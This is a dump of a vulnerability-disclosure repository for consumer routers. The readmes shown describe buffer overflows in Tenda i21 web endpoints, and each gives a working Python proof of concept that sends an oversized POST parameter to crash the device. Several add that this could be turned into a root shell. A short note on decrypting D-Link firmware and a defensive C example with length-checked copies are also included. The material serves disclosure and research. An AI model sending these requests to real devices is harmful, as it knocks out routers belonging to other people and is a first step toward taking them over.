Repository layout (image files are listed as ranges, e.g. images/01-03.png means 01.png, 02.png and 03.png):

├── README.md
├── Tenda/i21/
│   ├── formAddSysLogRule/        readme.md, imgs/{1.png, 2.png, readme.md}
│   ├── formSetDiagnoseInfo/      readme.md, imgs/{1.png, 2.png, readme.md}
│   ├── formSetSnmpInfo/          readme.md, imgs/{1.png, 2.png, 3.png, readme.md}
│   ├── formSetSysPwd/            readme.md, imgs/{1.png, 2.png, readme.md}
│   ├── formSetUplinkInfo/        readme.md, imgs/{1.png, 2.png, readme.md}
│   └── readme.md
├── dlink/878_decrypt/
│   ├── DIR878A1_FW104B05_Middle_FW_Unencrypt.bin
│   ├── DIR878A1_FW104B05_Middleware.bin
│   ├── decrypt dlink based dir878 zh.md
│   └── images/01.png
├── tenda_ac6/
│   ├── addWifiMacFilter_deviceId/            addWifiMacFilter_deviceId.md, images/01-03.png
│   ├── addWifiMacFilter_deviceMac/           addWifiMacFilter_derviceMac.md, images/01-03.png
│   ├── formSetCfm/                           formSetCfm.md, images/01-04.png
│   ├── formSetClientState_deviceId/          formSetClientState_deviceId.md, images/01-03.png
│   ├── formSetClientState_limitSpeed/        formSetClientState_limitSpeed.md, images/01-03.png
│   ├── formSetClientState_limitSpeedUp/      formSetClientState_limitSpeed.md, images/01-03.png
│   ├── formSetDeviceName/                    formSetDeviceName.md, images/01-04.png
│   ├── formSetFirewallCfg/                   formSetFirewallCfg.md, images/01-03.png
│   ├── formSetMacFilterCfg/                  formSetMacFilterCfg.md, images/01-07.png
│   ├── formSetPPTPServer_endIp/              formSetPPTPServer_endIp.md, images/01-03.png
│   ├── formSetPPTPServer_startIp/            formSetPPTPServer_startIp.md, images/01-03.png
│   ├── formSetQosBand/                       formSetQosBand.md, images/01-04.png
│   ├── formSetSpeedWan/                      formSetSpeedWan.md, images/01-03.png
│   ├── formSetVirtualSer/                    formSetVirtualSer.md, images/01-04.png
│   ├── form_fast_setting_wifi_set_ssid/      form_fast_setting_wifi_set_ssid.md, images/01-03.png
│   ├── form_fast_setting_wifi_set_timeZone/  form_fast_setting_wifi_set_timeZone.md, images/01-03.png
│   ├── fromAddressNat/                       fromAddressNat.md, images/01-03.png
│   ├── fromNatStaticSetting/                 fromNatStaticSetting_page.md, images/01-03.png
│   ├── fromSetIpMacBind/                     fromSetIpMacBind.md, images/01-04.png
│   ├── fromSetSysTime/                       fromSetSysTime.md, images/01-03.png
│   ├── fromSetWirelessRepeat/                fromSetWirelessRepeat.md, images/01-03.png
│   ├── saveParentControlInfo_deviceId/       saveParentControlInfo_deviceid.md, images/01-03.png
│   ├── saveParentControlInfo_time/           saveParentControlInfo_time.md, images/01-03.png
│   ├── saveParentControlInfo_urls/           saveParentControlInfo_urls.md, images/01-03.png
│   ├── setSchedWifi_schedEndTime/            setSchedWifi_schedEndTime.md, images/01-03.png
│   ├── setSchedWifi_schedStartTime/          setSchedWifi_schedStartTime.md, images/01-03.png
│   └── setSmartPowerManagement/              setSmartPowerManagement.md, images/01-03.png
├── tenda_ac6v1.0_vuln/
│   ├── Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability.md
│   └── images/{01.png, 02.png, 04.png, 05.png, 06.png, 3.png}
├── tenda_f1203/
│   ├── GetParentControlInfo/                 GetParentControlInfo.md, images/01-03.png
│   ├── addWifiMacFilter_deviceId/            addWifiMacFilter_deviceId.md, images/01-03.png
│   ├── addWifiMacFilter_deviceMac/           addWifiMacFilter_deviceMac.md, images/01-03.png
│   ├── formSetClientState_deviceId/          formSetClientState_deviceId.md, images/01-03.png
│   ├── formSetClientState_limitSpeed/        formSetClientState_limitSpeed.md, images/01-03.png
│   ├── formSetClientState_limitSpeedUp/      formSetClientState_limitSpeedUp.md, images/01-03.png
│   ├── formSetSpeedWan/                      formSetSpeedWan.md, images/01-03.png
│   ├── formWifiBasicSet_security _5g/        formWifiBasicSet_security_5g.md, images/01-03.png
│   ├── formWifiBasicSet_security/            formWifiBasicSet_security.md, images/01-03.png
│   ├── formWriteFacMac/                      formWriteFacMac.md, images/01-02.png
│   ├── form_fast_setting_wifi_set/           form_fast_setting_wifi_set.md, images/01-03.png
│   ├── formexeCommand/                       formexeCommand.md, images/01-03.png
│   ├── fromAddressNat_entrys/                fromAddressNat_entrys.md, images/01-03.png
│   ├── fromAddressNat_mitInterface/          fromAddressNat_mitInterface.md, images/01-03.png
│   ├── fromAddressNat_page/                  fromAddressNat_page.md, images/01-03.png
│   ├── fromDhcpListClient/                   fromDhcpListClient.md, images/01-03.png
│   ├── fromNatStaticSetting/                 fromNatStaticSetting.md, images/01-03.png
│   ├── fromRouteStatic/                      fromRouteStatic.md, images/01-03.png
│   ├── fromVirtualSer/                       fromVirtualSer.md, images/01-03.png
│   ├── saveParentControlInfo_deviceId/       saveParentControlInfo_deviceId.md, images/01-04.png
│   ├── saveParentControlInfo_time/           saveParentControlInfo_time.md, images/01-04.png
│   └── saveParentControlInfo_urls/           saveParentControlInfo_urls.md, images/01-04.png
├── tenda_i22/
│   ├── firmware/US_i22V1.0BR_V1.0.0.3(4687)_CN_TDC01.zip
│   ├── formSetAppFilterRule/                 formSetAppFilterRule.md, images/01-04.png
│   ├── formSetAutoPing_ping2/                formSetAutoPing_ping2.md, images/01-03.png
│   ├── formSetCfm/                           formWifiMacFilterSet.md, images/01-04.png
│   ├── formWifiMacFilterSet/                 formWifiMacFilterSet.md, images/01-03.png
│   ├── formWx3AuthorizeSet/                  formWx3AuthorizeSet.md, images/01-03.png
│   ├── formwrlSSIDget/                       formWifiMacFilterGet.md, images/01-03.png
│   ├── formwrlSSIDset/                       formwrlSSIDset.md, images/01-03.png
│   ├── fromSysToolReboot/                    fromSysToolReboot.md, images/01-04.png
│   └── fromSysToolRestoreSet/                fromSysToolRestoreSet.md, images/01-04.png
├── totolink_ca300-poe/
│   ├── NTPSyncWithHost/                      NTPSyncWithHost.md, images/1-5.png
│   ├── firmware/TOTOLINK_C8B810A-1E_NA_AP0155_QCA9531_SPI_16M128M_V6.2c.884_B20180522_ALL.web
│   ├── root_hard_code/                       root_hard_code.md, images/1-4.png
│   ├── setNetworkDiag_NetDiagHost/           setNetworkDiag_NetDiagHost.md, images/1-7.png
│   ├── setNetworkDiag_NetDiagPingNum/        setNetworkDiag_NetDiagPingNum.md, images/{1,2,3,5,6,7}.png
│   ├── setNetworkDiag_NetDiagPingSize/       setNetworkDiag_NetDiagPingSize.md, images/{1,2,3,5,6,7}.png
│   ├── setNetworkDiag_NetDiagPingTimeOut/    setNetworkDiag_NetDiagPingTimeOut.md, images/{1,2,3,5,6,7}.png
│   ├── setNetworkDiag_NetDiagTracertHop/     setNetworkDiag_NetDiagTracertHop.md, images/{1,2,3,5,6,7,8}.png
│   ├── setRebootScheCfg_hour/                setRebootScheCfg_hour.md, images/1-5.png
│   ├── setRebootScheCfg_minute/              setRebootScheCfg_minute.md, images/1-5.png
│   ├── setUnloadUserData/                    setUnloadUserData.md, images/1-5.png
│   ├── setUploadUserData/                    setUploadUserData.md, images/1-5.png
│   └── telnet_hard_code/                     telnet_hard_code.md, images/1-3.png
└── totolink_t8/
    ├── firmware/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.web
    ├── meshSlaveDlfw/                        meshSlaveDlfw.md, images/1-5.png
    ├── meshSlaveUpdate/                      meshSlaveUpdate.md, images/1-5.png
    ├── recvSlaveCloudCheckStatus_ip/         recvSlaveCloudCheckStatus_ip.md, images/1-5.png
    ├── recvSlaveCloudCheckStatus_version/    recvSlaveCloudCheckStatus.md, images/1-5.png
    ├── recvSlaveUpgstatus/                   recvSlaveUpgstatus.md, images/1-5.png
    ├── setUpgradeFW/                         setUpgradeFW.md, images/1-5.png
    ├── telnet_login/                         telnet_login.md, images/1-7.png
    └── updateWifiInfo/                       updateWifiInfo.md, images/1-5.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-vulns

--------------------------------------------------------------------------------
/Tenda/i21/formAddSysLogRule/imgs/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formAddSysLogRule/imgs/1.png

--------------------------------------------------------------------------------
/Tenda/i21/formAddSysLogRule/imgs/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formAddSysLogRule/imgs/2.png

--------------------------------------------------------------------------------
/Tenda/i21/formAddSysLogRule/imgs/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Tenda/i21/formAddSysLogRule/readme.md:
--------------------------------------------------------------------------------
# Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability

## Firmware information

- Manufacturer's address: https://www.tenda.com.cn/

- Firmware download address: https://www.tenda.com.cn/download/detail-2982.html

## Affected version

![](imgs/1.png)

## Vulnerability details

![](imgs/2.png)

In /goform/AddSysLogRule, when op is add, the user-supplied values logip, logport and len are concatenated into mib_value with sprintf. None of the three is checked for length, so an over-long value overruns the buffer and causes a stack overflow.

## Poc

```python
import socket
import os

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

ip = '192.168.0.1'
port = 80

r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

r.connect((ip, port))

rn = b'\r\n'

# 0x3000-byte parameter value, far larger than the destination buffer
p1 = b'a' * 0x3000
p2 = b'op=add&logip=' + p1

p3 = b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) + rn
p3 += b'Content-Type: application/x-www-form-urlencoded' + rn
p3 += rn
p3 += p2

r.send(p3)

response = r.recv(4096)
response = response.decode()
li(response)
```

The router crashes; with a full exploit this could be turned into a root shell.

--------------------------------------------------------------------------------
/Tenda/i21/formSetDiagnoseInfo/imgs/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetDiagnoseInfo/imgs/1.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetDiagnoseInfo/imgs/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetDiagnoseInfo/imgs/2.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetDiagnoseInfo/imgs/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Tenda/i21/formSetDiagnoseInfo/readme.md:
--------------------------------------------------------------------------------
# Tenda i21 V1.0.0.14(4656) Heap overflow vulnerability

## Firmware information

- Manufacturer's address: https://www.tenda.com.cn/

- Firmware download address: https://www.tenda.com.cn/download/detail-2982.html

## Affected version

![](imgs/1.png)

## Vulnerability details

![](imgs/2.png)

In /goform/setDiagnoseInfo, a heap buffer of 0x50 bytes is allocated, and the part of the cmd parameter after its first 5 bytes (cmd + 5) is copied into it with strcpy. The length is not checked, resulting in a heap overflow.

## Poc

```python
import socket
import os

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

ip = '192.168.0.1'
port = 80

r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

r.connect((ip, port))

rn = b'\r\n'

# 0x3000-byte cmd value against a 0x50-byte heap buffer
p1 = b'a' * 0x3000
p2 = b'cmd=' + p1

p3 = b"POST /goform/setDiagnoseInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) + rn
p3 += b'Content-Type: application/x-www-form-urlencoded' + rn
p3 += rn
p3 += p2

r.send(p3)

response = r.recv(4096)
response = response.decode()
li(response)
```

The router crashes.

--------------------------------------------------------------------------------
/Tenda/i21/formSetSnmpInfo/imgs/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSnmpInfo/imgs/1.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetSnmpInfo/imgs/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSnmpInfo/imgs/2.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetSnmpInfo/imgs/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSnmpInfo/imgs/3.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetSnmpInfo/imgs/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Tenda/i21/formSetSnmpInfo/readme.md:
--------------------------------------------------------------------------------
# Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability

## Firmware information

- Manufacturer's address: https://www.tenda.com.cn/

- Firmware download address: https://www.tenda.com.cn/download/detail-2982.html

## Affected version

![](imgs/1.png)

## Vulnerability details

![](imgs/2.png)

![](imgs/3.png)

In /goform/setSnmpInfo, the snmpEn parameter is user-controlled and is formatted into parm with sprintf. Its length is not checked, which causes a stack overflow.

## Poc

```python
import socket
import os

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

ip = '192.168.0.1'
port = 80

r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

r.connect((ip, port))

rn = b'\r\n'

# 0x3000-byte snmpEn value
p1 = b'a' * 0x3000
p2 = b'snmpEn=' + p1

p3 = b"POST /goform/setSnmpInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) + rn
p3 += b'Content-Type: application/x-www-form-urlencoded' + rn
p3 += rn
p3 += p2

r.send(p3)

response = r.recv(4096)
response = response.decode()
li(response)
```

The router crashes; with a full exploit this could be turned into a root shell.

--------------------------------------------------------------------------------
/Tenda/i21/formSetSysPwd/imgs/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSysPwd/imgs/1.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetSysPwd/imgs/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSysPwd/imgs/2.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetSysPwd/imgs/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Tenda/i21/formSetSysPwd/readme.md:
--------------------------------------------------------------------------------
# Tenda i21 V1.0.0.14(4656) DoS vulnerability

## Firmware information

- Manufacturer's address: https://www.tenda.com.cn/

- Firmware download address: https://www.tenda.com.cn/download/detail-2982.html

## Affected version

![](imgs/1.png)

## Vulnerability details

![](imgs/2.png)

In /goform/setSysPwd, when action is set to admin, the value of oldPwd is base64-encoded into v3, and v3 is then copied into encode_pwd with strcpy. The length is not checked, resulting in a stack overflow.

## Poc

```python
import socket
import os

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

ip = '192.168.0.1'
port = 80

r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

r.connect((ip, port))

rn = b'\r\n'

# 0x3000-byte oldPwd value
p1 = b'a' * 0x3000
p2 = b'action=admin&oldPwd=' + p1

p3 = b"POST /goform/setSysPwd" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) + rn
p3 += b'Content-Type: application/x-www-form-urlencoded' + rn
p3 += rn
p3 += p2

r.send(p3)

response = r.recv(4096)
response = response.decode()
li(response)
```

The router crashes.

--------------------------------------------------------------------------------
/Tenda/i21/formSetUplinkInfo/imgs/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetUplinkInfo/imgs/1.png

--------------------------------------------------------------------------------
/Tenda/i21/formSetUplinkInfo/imgs/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetUplinkInfo/imgs/2.png
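The i21 readmes above (AddSysLogRule, setDiagnoseInfo, setSnmpInfo, setSysPwd) and the setUplinkInfo one that follows all describe the same defect class: a request parameter is formatted with sprintf or copied with strcpy into a fixed-size buffer with no length check. The following C is an added example, not code from this repository or from Tenda's firmware, showing the defensive form of that step: validate each field against what it is supposed to hold, format with a bounded snprintf and check its return value, and refuse an over-long value instead of truncating or overrunning. The buffer size MIB_VALUE_MAX, the "ip:port:len" output layout, and the function and enum names are assumptions; the firmware's real sizes and formats are not on this page.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>   /* inet_pton, used to validate an IPv4 address */

/* Assumed capacity of the fixed buffer the rule is formatted into; the
 * real size of mib_value in the firmware is not given on this page. */
#define MIB_VALUE_MAX 64

enum rule_status {
    RULE_OK = 0,
    RULE_BAD_IP,        /* logip is not a dotted-quad IPv4 address */
    RULE_BAD_PORT,      /* logport is not an integer in 1..65535 */
    RULE_BAD_LEN,       /* len is not an integer in 0..65535 */
    RULE_TRUNCATED      /* the formatted rule would not fit the buffer */
};

/* 1 if s parses as an IPv4 address, 0 otherwise (NULL is rejected). */
static int is_ipv4(const char *s)
{
    struct in_addr addr;
    return s != NULL && inet_pton(AF_INET, s, &addr) == 1;
}

/* Parse s as an unsigned decimal integer in [lo, hi]. Rejects empty
 * strings, explicit signs, trailing junk and out-of-range values. */
static int parse_bounded(const char *s, long lo, long hi, long *out)
{
    char *end;
    long v;
    if (s == NULL || *s == '\0' || *s == '-' || *s == '+')
        return 0;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || v < lo || v > hi)
        return 0;
    *out = v;
    return 1;
}

/* Hardened version of "format three request parameters into mib_value".
 * Every field is validated first, snprintf is bounded by cap, and the
 * return value is checked so an over-long result is reported rather than
 * written past the end of the buffer as unchecked sprintf would do. */
enum rule_status build_syslog_rule(const char *logip, const char *logport,
                                   const char *len, char *mib_value, size_t cap)
{
    long port, length;
    int n;

    if (!is_ipv4(logip))
        return RULE_BAD_IP;
    if (!parse_bounded(logport, 1, 65535, &port))
        return RULE_BAD_PORT;
    if (!parse_bounded(len, 0, 65535, &length))
        return RULE_BAD_LEN;

    /* The "ip:port:len" layout is an assumption made for illustration. */
    n = snprintf(mib_value, cap, "%s:%ld:%ld", logip, port, length);
    if (n < 0 || (size_t)n >= cap)
        return RULE_TRUNCATED;
    return RULE_OK;
}

/* Bounded replacement for strcpy into a fixed buffer (the setDiagnoseInfo
 * and setSysPwd pattern). Copies and returns 1 only when src plus its
 * terminator fits in cap bytes; otherwise returns 0 and leaves dst alone,
 * so an oversized value is rejected rather than silently truncated. */
int copy_checked(char *dst, size_t cap, const char *src)
{
    size_t n = 0;
    if (dst == NULL || src == NULL || cap == 0)
        return 0;
    while (n < cap && src[n] != '\0')   /* bounded strlen: never reads past cap */
        n++;
    if (n >= cap)
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

int main(void)
{
    char mib[MIB_VALUE_MAX];
    char cmd[0x50];              /* same size as the heap buffer in the readme */
    char big[0x3000 + 1];        /* constructed oversized value, like the PoCs send */

    memset(big, 'a', 0x3000);
    big[0x3000] = '\0';

    printf("well-formed rule: %d (%s)\n",
           build_syslog_rule("192.168.0.1", "514", "1024", mib, sizeof mib), mib);
    printf("oversized logip:  %d\n",
           build_syslog_rule(big, "514", "1024", mib, sizeof mib));
    printf("oversized cmd copied: %d\n", copy_checked(cmd, sizeof cmd, big));
    return 0;
}
```

Rejecting rather than truncating is deliberate: a silently truncated IP or password produces a rule or credential the operator never intended, and the explicit status code gives the handler something to log, which is also the signal a defender would want from a device that is being probed with 0x3000-byte parameters.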
--------------------------------------------------------------------------------
/Tenda/i21/formSetUplinkInfo/imgs/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Tenda/i21/formSetUplinkInfo/readme.md:
--------------------------------------------------------------------------------
# Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability

## Firmware information

- Manufacturer's address: https://www.tenda.com.cn/

- Firmware download address: https://www.tenda.com.cn/download/detail-2982.html

## Affected version

![](imgs/1.png)

## Vulnerability details

![](imgs/2.png)

In /goform/setUplinkInfo, the pingHostIp1 parameter is user-controlled and is formatted into auto_ping_ip with sprintf. Its length is not checked, resulting in a stack overflow.

## Poc

```python
import socket
import os

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

ip = '192.168.0.1'
port = 80

r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

r.connect((ip, port))

rn = b'\r\n'

# 0x3000-byte pingHostIp1 value
p1 = b'a' * 0x3000
p2 = b'upLinkEn=true&pingHostIp1=' + p1

p3 = b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) + rn
p3 += b'Content-Type: application/x-www-form-urlencoded' + rn
p3 += rn
p3 += p2

r.send(p3)

response = r.recv(4096)
response = response.decode()
li(response)
```

The router crashes; with a full exploit this could be turned into a root shell.

--------------------------------------------------------------------------------
/Tenda/i21/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/dlink/878_decrypt/DIR878A1_FW104B05_Middle_FW_Unencrypt.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/dlink/878_decrypt/DIR878A1_FW104B05_Middle_FW_Unencrypt.bin

--------------------------------------------------------------------------------
/dlink/878_decrypt/DIR878A1_FW104B05_Middleware.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/dlink/878_decrypt/DIR878A1_FW104B05_Middleware.bin

--------------------------------------------------------------------------------
/dlink/878_decrypt/decrypt dlink based dir878 zh.md:
--------------------------------------------------------------------------------
# Decrypting some D-Link encrypted firmware based on the DIR-878

## Preface

The DIR-878 firmware is encrypted, but an unencrypted intermediate firmware was found:

http://files.dlink.com.au/Products/DIR-878/REV_A/Firmware/DIR-878_FW1.04B05/

![image-20221130182817661](images/01.png)

This firmware contains a mipsel-architecture program that decrypts the image; the same program can also decrypt several other firmware images that use the same encryption algorithm.

--------------------------------------------------------------------------------
/dlink/878_decrypt/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/dlink/878_decrypt/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceId/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceMac/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceMac/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceMac/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceMac/images/02.png 
-------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceMac/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceMac/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_deviceId/images/01.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeed/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeed/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeed/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeed/images/02.png -------------------------------------------------------------------------------- 